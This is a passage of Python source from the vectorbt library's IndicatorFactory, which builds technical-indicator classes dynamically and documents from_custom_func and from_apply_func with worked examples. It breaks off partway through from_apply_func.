in_output_names (list of str): A list of names of in-place output arrays.
An in-place output is an output that is not returned but modified in-place.
Some advantages of such outputs include:
1) they don't need to be returned,
2) they can be passed between functions as easily as inputs,
3) they can be provided with already allocated data to safe memory,
4) if data or default value are not provided, they are created empty to not occupy memory.
output_names (list of str): A list of names of output arrays.
output_flags (dict): A dictionary of in-place and regular output flags.
custom_output_props (dict): A dictionary with user-defined functions that will be
bound to the indicator class and (if not a property) wrapped with `@cached_property`.
attr_settings (dict): A dictionary of settings by attribute name.
Attributes can be `input_names`, `in_output_names`, `output_names` and `custom_output_props`.
Following keys are accepted:
* `dtype`: Data type used to determine which methods to generate around this attribute.
Set to None to disable. Default is `np.float_`. Can be set to instance of
`collections.namedtuple` acting as enumerated type; it will then create a property
with suffix `readable` that contains data in a string format.
!!! note
The `__init__` method is not used for running the indicator, for this use `run`.
The reason for this is indexing, which requires a clean `__init__` method for creating
a new indicator object with newly indexed attributes.
"""
# Check and save parameters
self.class_name = class_name
checks.assert_type(class_name, str)
self.class_docstring = class_docstring
checks.assert_type(class_docstring, str)
self.module_name = module_name
if module_name is not None:
checks.assert_type(module_name, str)
if short_name is None:
if class_name == 'Indicator':
short_name = 'custom'
else:
short_name = class_name.lower()
self.short_name = short_name
checks.assert_type(short_name, str)
self.prepend_name = prepend_name
checks.assert_type(prepend_name, bool)
if input_names is None:
input_names = []
checks.assert_type(input_names, (tuple, list))
self.input_names = input_names
if param_names is None:
param_names = []
checks.assert_type(param_names, (tuple, list))
self.param_names = param_names
if in_output_names is None:
in_output_names = []
checks.assert_type(in_output_names, (tuple, list))
self.in_output_names = in_output_names
if output_names is None:
output_names = []
checks.assert_type(output_names, (tuple, list))
self.output_names = output_names
all_output_names = in_output_names + output_names
if len(all_output_names) == 0:
raise ValueError("Must have at least one in-place or regular output")
if output_flags is None:
output_flags = {}
checks.assert_type(output_flags, dict)
if len(output_flags) > 0:
checks.assert_dict_valid(output_flags, [all_output_names])
self.output_flags = output_flags
if custom_output_props is None:
custom_output_props = {}
checks.assert_type(custom_output_props, dict)
self.custom_output_props = custom_output_props
if attr_settings is None:
attr_settings = {}
checks.assert_type(attr_settings, dict)
all_attr_names = input_names + all_output_names + list(custom_output_props.keys())
if len(attr_settings) > 0:
checks.assert_dict_valid(attr_settings, [all_attr_names])
self.attr_settings = attr_settings
# Set up class
ParamIndexer = ParamIndexerFactory(
param_names + (['tuple'] if len(param_names) > 1 else []),
module_name=module_name
)
Indicator = type(self.class_name, (Wrapping, ParamIndexer), {})
Indicator.__doc__ = self.class_docstring
if module_name is not None:
Indicator.__module__ = self.module_name
# Add indexing methods
def _indexing_func(obj, pd_indexing_func, **kwargs):
new_wrapper, idx_idxs, _, col_idxs = obj.wrapper._indexing_func_meta(pd_indexing_func, **kwargs)
idx_idxs_arr = reshape_fns.to_1d(idx_idxs, raw=True)
col_idxs_arr = reshape_fns.to_1d(col_idxs, raw=True)
if np.array_equal(idx_idxs_arr, np.arange(obj.wrapper.shape_2d[0])):
idx_idxs_arr = slice(None, None, None)
if np.array_equal(col_idxs_arr, np.arange(obj.wrapper.shape_2d[1])):
col_idxs_arr = slice(None, None, None)
input_mapper = getattr(obj, '_input_mapper', None)
if input_mapper is not None:
input_mapper = input_mapper[col_idxs_arr]
input_list = []
for input_name in input_names:
input_list.append(getattr(obj, f'_{input_name}')[idx_idxs_arr])
in_output_list = []
for in_output_name in in_output_names:
in_output_list.append(getattr(obj, f'_{in_output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
output_list = []
for output_name in output_names:
output_list.append(getattr(obj, f'_{output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
param_list = []
for param_name in param_names:
param_list.append(getattr(obj, f'_{param_name}_array'))
mapper_list = []
for param_name in param_names:
# Tuple mapper is a list because of its complex data type
mapper_list.append(getattr(obj, f'_{param_name}_mapper')[col_idxs_arr])
return obj.copy(
wrapper=new_wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list
)
setattr(Indicator, '_indexing_func', _indexing_func)
# Create read-only properties
prop = property(lambda _self: _self._short_name)
prop.__doc__ = "Name of the indicator."
setattr(Indicator, 'short_name', prop)
prop = property(lambda _self: _self._level_names)
prop.__doc__ = "Column level names corresponding to each parameter."
setattr(Indicator, 'level_names', prop)
prop = classproperty(lambda _self: input_names)
prop.__doc__ = "Names of the input arrays."
setattr(Indicator, 'input_names', prop)
prop = classproperty(lambda _self: param_names)
prop.__doc__ = "Names of the parameters."
setattr(Indicator, 'param_names', prop)
prop = classproperty(lambda _self: in_output_names)
prop.__doc__ = "Names of the in-place output arrays."
setattr(Indicator, 'in_output_names', prop)
prop = classproperty(lambda _self: output_names)
prop.__doc__ = "Names of the regular output arrays."
setattr(Indicator, 'output_names', prop)
prop = classproperty(lambda _self: output_flags)
prop.__doc__ = "Dictionary of output flags."
setattr(Indicator, 'output_flags', prop)
for param_name in param_names:
prop = property(lambda _self, param_name=param_name: getattr(_self, f'_{param_name}_array'))
prop.__doc__ = f"Array of `{param_name}` combinations."
setattr(Indicator, f'{param_name}_array', prop)
for input_name in input_names:
def input_prop(_self, input_name=input_name):
"""Input array."""
old_input = reshape_fns.to_2d(getattr(_self, '_' + input_name), raw=True)
input_mapper = getattr(_self, '_input_mapper')
if input_mapper is None:
return _self.wrapper.wrap(old_input)
return _self.wrapper.wrap(old_input[:, input_mapper])
input_prop.__name__ = input_name
setattr(Indicator, input_name, cached_property(input_prop))
for output_name in all_output_names:
def output_prop(_self, _output_name=output_name):
return _self.wrapper.wrap(getattr(_self, '_' + _output_name))
if output_name in in_output_names:
output_prop.__doc__ = """In-place output array."""
else:
output_prop.__doc__ = """Output array."""
output_prop.__name__ = output_name
if output_name in output_flags:
_output_flags = output_flags[output_name]
if isinstance(_output_flags, (tuple, list)):
_output_flags = ', '.join(_output_flags)
output_prop.__doc__ += "\n\n" + _output_flags
setattr(Indicator, output_name, property(output_prop))
# Add __init__ method
def __init__(_self, wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
perform_init_checks(
wrapper,
input_list,
input_mapper,
in_output_list,
output_list,
param_list,
mapper_list,
short_name,
level_names
)
Wrapping.__init__(
_self,
wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list,
short_name=short_name,
level_names=level_names
)
for i, ts_name in enumerate(input_names):
setattr(_self, f'_{ts_name}', input_list[i])
setattr(_self, '_input_mapper', input_mapper)
for i, in_output_name in enumerate(in_output_names):
setattr(_self, f'_{in_output_name}', in_output_list[i])
for i, output_name in enumerate(output_names):
setattr(_self, f'_{output_name}', output_list[i])
for i, param_name in enumerate(param_names):
setattr(_self, f'_{param_name}_array', param_list[i])
setattr(_self, f'_{param_name}_mapper', mapper_list[i])
if len(param_names) > 1:
tuple_mapper = list(zip(*list(mapper_list)))
setattr(_self, '_tuple_mapper', tuple_mapper)
else:
tuple_mapper = None
setattr(_self, '_short_name', short_name)
setattr(_self, '_level_names', level_names)
# Initialize indexers
mapper_sr_list = []
for i, m in enumerate(mapper_list):
mapper_sr_list.append(pd.Series(m, index=wrapper.columns))
if tuple_mapper is not None:
mapper_sr_list.append(pd.Series(tuple_mapper, index=wrapper.columns))
ParamIndexer.__init__(
_self, mapper_sr_list,
level_names=[*level_names, tuple(level_names)]
)
setattr(Indicator, '__init__', __init__)
# Add user-defined outputs
for prop_name, prop in custom_output_props.items():
if prop.__doc__ is None:
prop.__doc__ = f"""Custom property."""
if not isinstance(prop, (property, cached_property)):
prop.__name__ = prop_name
prop = cached_property(prop)
setattr(Indicator, prop_name, prop)
# Add comparison & combination methods for all inputs, outputs, and user-defined properties
for attr_name in all_attr_names:
_attr_settings = attr_settings.get(attr_name, {})
checks.assert_dict_valid(_attr_settings, [['dtype']])
dtype = _attr_settings.get('dtype', np.float_)
if checks.is_namedtuple(dtype):
def attr_readable(_self, attr_name=attr_name, enum=dtype):
if _self.wrapper.ndim == 1:
return getattr(_self, attr_name).map(lambda x: '' if x == -1 else enum._fields[x])
return getattr(_self, attr_name).applymap(lambda x: '' if x == -1 else enum._fields[x])
attr_readable.__qualname__ = f'{Indicator.__name__}.{attr_name}_readable'
attr_readable.__doc__ = f"""{attr_name} in readable format based on enum {dtype}."""
setattr(Indicator, f'{attr_name}_readable', property(attr_readable))
elif np.issubdtype(dtype, np.number):
def assign_numeric_method(func_name, combine_func, attr_name=attr_name):
def numeric_method(_self, other, crossover=False, wait=0, after_false=True,
level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
out = combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
if crossover:
return out.vbt.signals.nst(wait + 1, after_false=after_false)
return out
numeric_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
numeric_method.__doc__ = f"""Return True for each element where `{attr_name}` is {func_name} `other`.
Set `crossover` to True to return the first True after crossover. Specify `wait` to return
True only when `{attr_name}` is {func_name} for a number of time steps in a row after crossover.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', numeric_method)
assign_numeric_method('above', np.greater)
assign_numeric_method('below', np.less)
assign_numeric_method('equal', np.equal)
elif np.issubdtype(dtype, np.bool_):
def assign_bool_method(func_name, combine_func, attr_name=attr_name):
def bool_method(_self, other, level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
return combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
bool_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
bool_method.__doc__ = f"""Return `{attr_name} {func_name.upper()} other`.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', bool_method)
assign_bool_method('and', np.logical_and)
assign_bool_method('or', np.logical_or)
assign_bool_method('xor', np.logical_xor)
self.Indicator = Indicator
def from_custom_func(self,
custom_func,
require_input_shape=False,
param_settings=None,
in_output_settings=None,
hide_params=None,
hide_default=True,
var_args=False,
keyword_only_args=False,
**pipeline_kwargs):
"""Build indicator class around a custom calculation function.
In contrast to `IndicatorFactory.from_apply_func`, this method offers full flexbility.
It's up to we to handle caching and concatenate columns for each parameter (for example,
by using `vectorbt.base.combine_fns.apply_and_concat_one`). Also, you should ensure that
each output array has an appropriate number of columns, which is the number of columns in
input arrays multiplied by the number of parameter combinations.
Args:
custom_func (callable): A function that takes broadcast arrays corresponding
to `input_names`, broadcast in-place output arrays corresponding to `in_output_names`,
broadcast parameter arrays corresponding to `param_names`, and other arguments and
keyword arguments, and returns outputs corresponding to `output_names` and other objects
that are then returned with the indicator instance.
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input stacked
n times (= the number of parameter values) along the column axis.
require_input_shape (bool): Whether to input shape is required.
param_settings (dict): A dictionary of parameter settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
in_output_settings (dict): A dictionary of in-place output settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
hide_params (list): Parameter names to hide column levels for.
Can be overwritten by any run method.
hide_default (bool): Whether to hide column levels of parameters with default value.
Can be overwritten by any run method.
var_args (bool): Whether run methods should accept variable arguments (`*args`).
Set to True if `custom_func` accepts positional agruments that are not listed in the config.
keyword_only_args (bool): Whether run methods should accept keyword-only arguments (`*`).
Set to True to force the user to use keyword arguments (e.g., to avoid misplacing arguments).
**pipeline_kwargs: Keyword arguments passed to `run_pipeline`.
Can be overwritten by any run method.
Can contain default values for `param_names` and `in_output_names`,
but also custom positional and keyword arguments passed to the `custom_func`.
Returns:
`Indicator`, and optionally other objects that are returned by `custom_func`
and exceed `output_names`.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_apply_func` example.
```python-repl
>>> @njit
>>> def apply_func_nb(i, ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1[i] + arg1, ts2 * p2[i] + arg2
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... return vbt.base.combine_fns.apply_and_concat_multiple_nb(
... len(p1), apply_func_nb, ts1, ts2, p1, p2, arg1, arg2)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_custom_func(custom_func, var_args=True, arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
The difference between `apply_func_nb` here and in `IndicatorFactory.from_apply_func` is that
here it takes the index of the current parameter combination that can be used for parameter selection.
You can also remove the entire `apply_func_nb` and define your logic in `custom_func`
(which shouldn't necessarily be Numba-compiled):
```python-repl
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... input_shape = ts1.shape
... n_params = len(p1)
... out1 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... out2 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... for k in range(n_params):
... for col in range(input_shape[1]):
... for i in range(input_shape[0]):
... out1[i, input_shape[1] * k + col] = ts1[i, col] * p1[k] + arg1
... out2[i, input_shape[1] * k + col] = ts2[i, col] * p2[k] + arg2
... return out1, out2
```
"""
Indicator = self.Indicator
short_name = self.short_name
prepend_name = self.prepend_name
input_names = self.input_names
param_names = self.param_names
in_output_names = self.in_output_names
output_names = self.output_names
all_input_names = input_names + param_names + in_output_names
setattr(Indicator, 'custom_func', custom_func)
def _merge_settings(old_settings, new_settings, allowed_keys=None):
new_settings = merge_dicts(old_settings, new_settings)
if len(new_settings) > 0 and allowed_keys is not None:
checks.assert_dict_valid(new_settings, allowed_keys)
return new_settings
def _resolve_refs(input_list, param_list, in_output_list):
# You can reference anything between inputs, parameters, and in-place outputs
# even parameter to input (thanks to broadcasting)
all_inputs = list(input_list + param_list + in_output_list)
for i in range(len(all_inputs)):
input = all_inputs[i]
is_default = False
if isinstance(input, DefaultParam):
input = input.value
is_default = True
if isinstance(input, str):
if input in all_input_names:
new_input = all_inputs[all_input_names.index(input)]
if is_default:
new_input = DefaultParam(new_input)
all_inputs[i] = new_input
input_list = all_inputs[:len(input_list)]
all_inputs = all_inputs[len(input_list):]
param_list = all_inputs[:len(param_list)]
in_output_list = all_inputs[len(param_list):]
return input_list, param_list, in_output_list
def _extract_inputs(args):
input_list = args[:len(input_names)]
checks.assert_len_equal(input_list, input_names)
args = args[len(input_names):]
param_list = args[:len(param_names)]
checks.assert_len_equal(param_list, param_names)
args = args[len(param_names):]
in_output_list = args[:len(in_output_names)]
checks.assert_len_equal(in_output_list, in_output_names)
args = args[len(in_output_names):]
if not var_args and len(args) > 0:
raise TypeError("Variable length arguments are not supported by this function "
"(var_args is set to False)")
input_list, param_list, in_output_list = _resolve_refs(input_list, param_list, in_output_list)
return input_list, param_list, in_output_list, args
for k, v in pipeline_kwargs.items():
if k in param_names and not isinstance(v, DefaultParam):
pipeline_kwargs[k] = DefaultParam(v) # track default params
pipeline_kwargs = merge_dicts({k: None for k in in_output_names}, pipeline_kwargs)
# Display default parameters and in-place outputs in the signature
default_kwargs = {}
for k in list(pipeline_kwargs.keys()):
if k in input_names or k in param_names or k in in_output_names:
default_kwargs[k] = pipeline_kwargs.pop(k)
if var_args and keyword_only_args:
raise ValueError("var_args and keyword_only_args cannot be used together")
# Add private run method
def_run_kwargs = dict(
short_name=short_name,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run(cls,
*args,
_param_settings=param_settings,
_in_output_settings=in_output_settings,
_pipeline_kwargs=pipeline_kwargs,
**kwargs):
_short_name = kwargs.pop('short_name', def_run_kwargs['short_name'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.pop('param_settings', {}),
[param_names]
)
_in_output_settings = _merge_settings(
_in_output_settings,
kwargs.pop('in_output_settings', {}),
[in_output_names]
)
if _hide_params is None:
_hide_params = []
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Prepare column levels
level_names = []
hide_levels = []
for i, pname in enumerate(param_names):
level_name = _short_name + '_' + pname if prepend_name else pname
level_names.append(level_name)
if pname in _hide_params or (_hide_default and isinstance(param_list[i], DefaultParam)):
hide_levels.append(i)
level_names = list(level_names)
param_list = [params.value if isinstance(params, DefaultParam) else params for params in param_list]
# Run the pipeline
results = run_pipeline(
len(output_names), # number of returned outputs
custom_func,
*args,
require_input_shape=require_input_shape,
input_list=input_list,
in_output_list=in_output_list,
param_list=param_list,
level_names=level_names,
hide_levels=hide_levels,
param_settings=[_param_settings.get(n, {}) for n in param_names],
in_output_settings=[_in_output_settings.get(n, {}) for n in in_output_names],
**merge_dicts(_pipeline_kwargs, kwargs)
)
# Return the raw result if any of the flags are set
if kwargs.get('return_raw', False) or kwargs.get('return_cache', False):
return results
# Unpack the result
wrapper, \
new_input_list, \
input_mapper, \
in_output_list, \
output_list, \
new_param_list, \
mapper_list, \
other_list = results
# Create a new instance
obj = cls(
wrapper,
new_input_list,
input_mapper,
in_output_list,
output_list,
new_param_list,
mapper_list,
short_name,
level_names
)
if len(other_list) > 0:
return (obj, *tuple(other_list))
return obj
setattr(Indicator, '_run', _run)
# Add public run method
# Create function dynamically to provide user with a proper signature
def compile_run_function(func_name, docstring, default_kwargs):
pos_names = []
main_kw_names = []
other_kw_names = []
for k in input_names + param_names:
if k in default_kwargs:
main_kw_names.append(k)
else:
pos_names.append(k)
main_kw_names.extend(in_output_names) # in_output_names are keyword-only
for k, v in default_kwargs.items():
if k not in pos_names and k not in main_kw_names:
other_kw_names.append(k)
_0 = func_name
_1 = '*, ' if keyword_only_args else ''
_2 = []
if require_input_shape:
_2.append('input_shape')
_2.extend(pos_names)
_2 = ', '.join(_2) + ', ' if len(_2) > 0 else ''
_3 = '*args, ' if var_args else ''
_4 = ['{}={}'.format(k, k) for k in main_kw_names + other_kw_names]
_4 = ', '.join(_4) + ', ' if len(_4) > 0 else ''
_5 = docstring
_6 = all_input_names
_6 = ', '.join(_6) + ', ' if len(_6) > 0 else ''
_7 = []
if require_input_shape:
_7.append('input_shape')
_7.extend(other_kw_names)
_7 = ['{}={}'.format(k, k) for k in _7]
_7 = ', '.join(_7) + ', ' if len(_7) > 0 else ''
func_str = "@classmethod\n" \
"def {0}(cls, {1}{2}{3}{4}**kwargs):\n" \
" \"\"\"{5}\"\"\"\n" \
" return cls._{0}({6}{3}{7}**kwargs)".format(
_0, _1, _2, _3, _4, _5, _6, _7
)
scope = {**dict(DefaultParam=DefaultParam), **default_kwargs}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
return scope[func_name]
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_docstring = """Run `{0}` indicator.
{1}
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.""".format(_0, _1)
run = compile_run_function('run', run_docstring, def_run_kwargs)
setattr(Indicator, 'run', run)
if len(param_names) > 0:
# Add private run_combs method
def_run_combs_kwargs = dict(
r=2,
param_product=False,
comb_func=itertools.combinations,
speedup=True,
short_names=None,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run_combs(cls,
*args,
_param_settings=param_settings,
**kwargs):
_r = kwargs.pop('r', def_run_combs_kwargs['r'])
_param_product = kwargs.pop('param_product', def_run_combs_kwargs['param_product'])
_comb_func = kwargs.pop('comb_func', def_run_combs_kwargs['comb_func'])
_speedup = kwargs.pop('speedup', def_run_combs_kwargs['speedup'])
_short_names = kwargs.pop('short_names', def_run_combs_kwargs['short_names'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.get('param_settings', {}), # get, not pop
[param_names]
)
if _hide_params is None:
_hide_params = []
if _short_names is None:
_short_names = [f'{short_name}_{str(i + 1)}' for i in range(_r)]
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Hide params
for i, pname in enumerate(param_names):
if _hide_default and isinstance(param_list[i], DefaultParam):
if pname not in _hide_params:
_hide_params.append(pname)
param_list[i] = param_list[i].value
checks.assert_len_equal(param_list, param_names)
# Prepare params
param_settings_list = [_param_settings.get(n, {}) for n in param_names]
for i in range(len(param_list)):
is_tuple = param_settings_list[i].get('is_tuple', False)
is_array_like = param_settings_list[i].get('is_array_like', False)
param_list[i] = params_to_list(param_list[i], is_tuple, is_array_like)
if _param_product:
param_list = create_param_product(param_list)
else:
param_list = broadcast_params(param_list)
if not isinstance(param_list, (tuple, list)):
param_list = [param_list]
# Speed up by pre-calculating raw outputs
if _speedup:
raw_results = cls._run(
*input_list,
*param_list,
*in_output_list,
*args,
return_raw=True,
speedup=False,
**kwargs
)
kwargs['use_raw'] = raw_results # use them next time
# Generate indicator instances
instances = []
if _comb_func == itertools.product:
param_lists = zip(*_comb_func(zip(*param_list), repeat=_r))
else:
param_lists = zip(*_comb_func(zip(*param_list), _r))
for i, param_list in enumerate(param_lists):
instances.append(cls._run(
*input_list,
*zip(*param_list),
*in_output_list,
*args,
short_name=_short_names[i],
hide_params=_hide_params,
hide_default=_hide_default,
speedup=False,
**kwargs
))
return tuple(instances)
setattr(Indicator, '_run_combs', _run_combs)
# Add public run_combs method
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_combs_docstring = """Create a combination of multiple `{0}` indicators using function `comb_func`.
{1}
`comb_func` must accept an iterable of parameter tuples and `r`.
Also accepts all combinatoric iterators from itertools such as `itertools.combinations`.
Pass `r` to specify how many indicators to run.
Pass `short_names` to specify the short name for each indicator.
Set `speedup` to True to first compute raw outputs for all parameters,
and then use them to build each indicator (faster).
Other keyword arguments are passed to `{0}.run`.""".format(_0, _1)
run_combs = compile_run_function('run_combs', run_combs_docstring, def_run_combs_kwargs)
setattr(Indicator, 'run_combs', run_combs)
return Indicator
def from_apply_func(self, apply_func, cache_func=None, pass_packed=False, kwargs_to_args=None,
numba_loop=False, use_ray=False, ray_kwargs=None, **kwargs):
"""Build indicator class around a custom apply function.
In contrast to `IndicatorFactory.from_custom_func`, this method handles a lot of things for you,
such as caching, parameter selection, and concatenation. Your part is writing a function `apply_func`
that accepts a selection of parameters (single values as opposed to multiple values in
`IndicatorFactory.from_custom_func`) and does the calculation. It then automatically concatenates
the resulting arrays into a single array per output.
While this approach is simpler, it's also less flexible, since we can only work with
one parameter selection at a time and can't view all parameters. The UDF `apply_func` also can't
take keyword arguments, nor it can return anything other than outputs listed in `output_names`.
!!! note
If `apply_func` is a Numba-compiled function:
* All inputs are automatically converted to NumPy arrays
* Each argument in `*args` must be of a Numba-compatible type
* You cannot pass keyword arguments
* Your outputs must be arrays of the same shape, data type and data order
Args:
apply_func (callable): A function that takes inputs, selection of parameters, and
other arguments, and does calculations to produce outputs.
Arguments are passed to `apply_func` in the following order:
* `input_shape` if `pass_input_shape` is set to True and `input_shape` not in `kwargs_to_args`
* `col` if `per_column` and `pass_col` are set to True and `col` not in `kwargs_to_args`
* broadcast time-series arrays corresponding to `input_names`
* broadcast in-place output arrays corresponding to `in_output_names`
* single parameter selection corresponding to `param_names`
* variable arguments if `var_args` is set to True
* arguments listed in `kwargs_to_args`
* `flex_2d` if `pass_flex_2d` is set to True and `flex_2d` not in `kwargs_to_args`
* keyword arguments if `apply_func` is not Numba-compiled
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input.
cache_func (callable): A caching function to preprocess data beforehand.
Takes the same arguments as `apply_func`. Should return a single object or a tuple of objects.
All returned objects will be passed unpacked as last arguments to `apply_func`.
Can be Numba-compiled.
pass_packed (bool): Whether to pass packed tuples for inputs, in-place outputs, and parameters.
kwargs_to_args (list of str): Keyword arguments from `kwargs` dict to pass as
positional arguments to the apply function.
Should be used together with `numba_loop` set to True since Numba doesn't support
variable keyword arguments.
Defaults to []. Order matters.
numba_loop (bool): Whether to loop using Numba.
Set to True when iterating large number of times over small input,
but note that Numba doesn't support variable keyword arguments.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
Additionally, each run method now supports `use_ray` argument, which indicates
whether to use Ray to execute `apply_func` in parallel. Only works with `numba_loop` set to False.
See `vectorbt.base.combine_fns.ray_apply` for related keyword arguments.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_custom_func` example.
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1 + arg1, ts2 * p2 + arg2
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_apply_func(
... apply_func_nb, var_args=True,
... kwargs_to_args=['arg2'], arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
"""
Indicator = self.Indicator
setattr(Indicator, 'apply_func', apply_func)
if kwargs_to_args is None:
kwargs_to_args = []
module_name = self.module_name
output_names = self.output_names
in_output_names = self.in_output_names
param_names = self.param_names
num_ret_outputs = len(output_names)
# Build a function that selects a parameter tuple
# Do it here to avoid compilation with Numba every time custom_func is run
_0 = "i"
_0 += ", args_before"
_0 += ", input_tuple"
if len(in_output_names) > 0:
_0 += ", in_output_tuples"
if len(param_names) > 0:
_0 += ", param_tuples"
_0 += ", *args"
if not numba_loop:
_0 += ", **_kwargs"
_1 = "*args_before"
if pass_packed:
_1 += ", input_tuple"
if len(in_output_names) > 0:
_1 += ", in_output_tuples[i]"
else:
_1 += ", ()"
if len(param_names) > 0:
_1 += ", param_tuples[i]"
else:
_1 += ", ()"
else:
_1 += ", *input_tuple"
if len(in_output_names) > 0:
_1 += ", *in_output_tuples[i]"
if len(param_names) > 0:
_1 += ", *param_tuples[i]"
_1 += ", *args"
if not numba_loop:
_1 += ", **_kwargs"
func_str = "def select_params_func({0}):\n return apply_func({1})".format(_0, _1)
scope = {'apply_func': apply_func}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
select_params_func = scope['select_params_func']
if module_name is not None:
select_params_func.__module__ = module_name
if numba_loop:
select_params_func = njit(select_params_func)
def custom_func(input_list, in_output_list, param_list, *args, input_shape=None,
col=None, flex_2d=None, return_cache=False, use_cache=None, use_ray=False, **_kwargs):
"""Custom function that forwards inputs and parameters to `apply_func`."""
if use_ray:
if len(in_output_names) > 0:
raise ValueError("Ray doesn't support in-place outputs")
if numba_loop:
if use_ray:
raise ValueError("Ray cannot be used within Numba")
if num_ret_outputs > 1:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_nb
elif num_ret_outputs == 1:
apply_and_concat_func = combine_fns.apply_and_concat_one_nb
else:
apply_and_concat_func = combine_fns.apply_and_concat_none_nb
else:
if num_ret_outputs > 1:
if use_ray:
